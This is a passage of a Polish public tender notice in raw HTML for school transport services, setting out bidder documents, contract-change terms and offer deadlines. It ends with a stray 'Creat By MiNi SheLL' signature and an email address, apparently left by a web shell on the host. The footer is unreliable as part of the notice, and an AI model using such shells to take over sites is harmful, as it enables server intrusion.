celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu<br/>Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie zgodnie z art. 274 ust. 1 ustawy PZP, aktualnych na dzień złożenia: 1) uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej:<br/>a) aktualnej licencji/zezwolenia zezwalającą na wykonanie krajowego transportu drogowego osób<br/>zgodnie z Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz.U. z 2019r. poz. 2140 z późn.<br/>zm.)<br/>2) w zakresie zdolności technicznej lub zawodowej:<br/>nie określa się.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć oświadczenie wstępne Wykonawcy wg wzoru stanowiącego załącznik<br/>nr 2 do SWZ, pełnomocnictwo, zobowiązanie podmiotu udostępniającego zasoby, <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Do oferty należy dołączyć oświadczenie wstępne Wykonawcy wg wzoru stanowiącego załącznik<br/>nr 2 do SWZ, pełnomocnictwo, zobowiązanie podmiotu udostępniającego zasoby <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> z art. 455 PZP. Strony dopuszczają dokonywanie zmian treści umowy, w następujących<br/>okolicznościach:<br/>1) dopuszcza się wprowadzenie zmian za zgodą Stron umowy,<br/>2) zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę,<br/>2. Zmiany, o których mowa mogą dotyczyć:<br/>1) wystąpienia siły wyższej;<br/>2) wystąpienia wyjątkowych okoliczności, niezależnych od Stron niniejszej umowy, których nie<br/>mogły one przewidzieć w chwili zawierania umowy, wpływających na realizację umowy;<br/>3) zmiany przepisów prawnych mających wpływ na przebieg realizacji umowy, a w<br/>szczególności zmiany przepisów podatkowych, przepisów oświatowych lub przepisów<br/>dotyczących transportu/przewozu osób;<br/>4) zmiany przebiegu tras autobusów, miejsc przystanków, godzin przyjazdu i odjazdu ze<br/>szkoły/przedszkola w przypadku zmian w organizacji pracy jednostek oświatowych, zmian w<br/>planie lekcji, zmian w zakresie dowozu dzieci niepełnosprawnych lub dodanie jednostki<br/>przedszkolnej mającej siedzibę w miejscowości leżącej na trasie autobusu;<br/>5) wystąpienia utrudnień w ruchu z powodu robót drogowych, których nie można było<br/>przewidzieć w chwili zawarcia umowy;<br/>6) wystąpienia warunków atmosferycznych, które ze względów obiektywnych uniemożliwiają<br/>wykonanie usługi zgodnie ze specyfikacją istotnych warunków zamówienia lub umową;<br/>7) zmian, gdy są one korzystne dla Zamawiającego np. skrócenie trasy przejazdu dające taki<br/>sam efekt dowiezienia dzieci do szkół i odwiezienia ich ze szkół;<br/>8) poprawy jakości świadczonej usługi pod warunkiem zachowania dotychczasowego<br/>wynagrodzenia;<br/>9) przyczyn wynikających ze zmiany stosunków społeczno-gospodarczych lub gdy z innych<br/>powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany<br/>których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę;<br/>10) zmiany podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował<br/>Zamawiający; jeżeli zmiana podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest<br/>obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca spełnia je w stopniu<br/>nie mniejszym niż podwykonawca, na którego zasoby Wykonawca powołał się w trakcie<br/>postępowania o udzielenie zamówienia;<br/>11) wystąpienia innych okoliczności niepowstałych z winy Wykonawcy;<br/>12) ilości lub długości tras wynikających z zapotrzebowania Zamawiającego co powodować<br/>będzie konieczność stworzenia przez Wykonawcę nowego kursu w komunikacji regularnej, o<br/>której mowa w § 1 ust. 8 niniejszej umowy, co powodować będzie zmianę wynagrodzenia<br/>miesięcznego, o którym mowa w § 7 ust. 1 proporcjonalnie do zmienionej długości tras.<br/>3. W przypadku zmiany o których mowa w ust. 2 pkt 3 w zakresie mającym wpływ na realizację<br/>przedmiotu zamówienia - odpowiednie zapisy umowy zostaną dostosowane do obowiązującego<br/>stanu prawnego.<br/>4. Zmiany mogą być zainicjowane tylko poprzez złożenie pisemnego wniosku. Wniosek powinien<br/>zawierać:<br/>1) opis zmiany,<br/>2) uzasadnienie zmiany,<br/>3) ewentualny czas wykonania zmiany lub wpływ zmiany na termin zakończenia umowy;<br/>5. Dokonanie zmian wymaga podpisania aneksu do umowy.<br/>6. Nie stanowi zmiany umowy w rozumieniu art. 455 ustawy Prawo zamówień publicznych:<br/>1) zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr<br/>rachunku bankowego);<br/>2) zmiana danych teleadresowych, osób reprezentujących strony lub oznaczenia stron umowy - wynikających ze zmiany<br/>stanu faktycznego albo prawnego;<br/>Pozostały zakres zmian z uwagi na ograniczoną ilość miejsca w ogłoszeniu umieszczono w SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Formularza dostępnego na platformie komercyjnej https://stepnica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com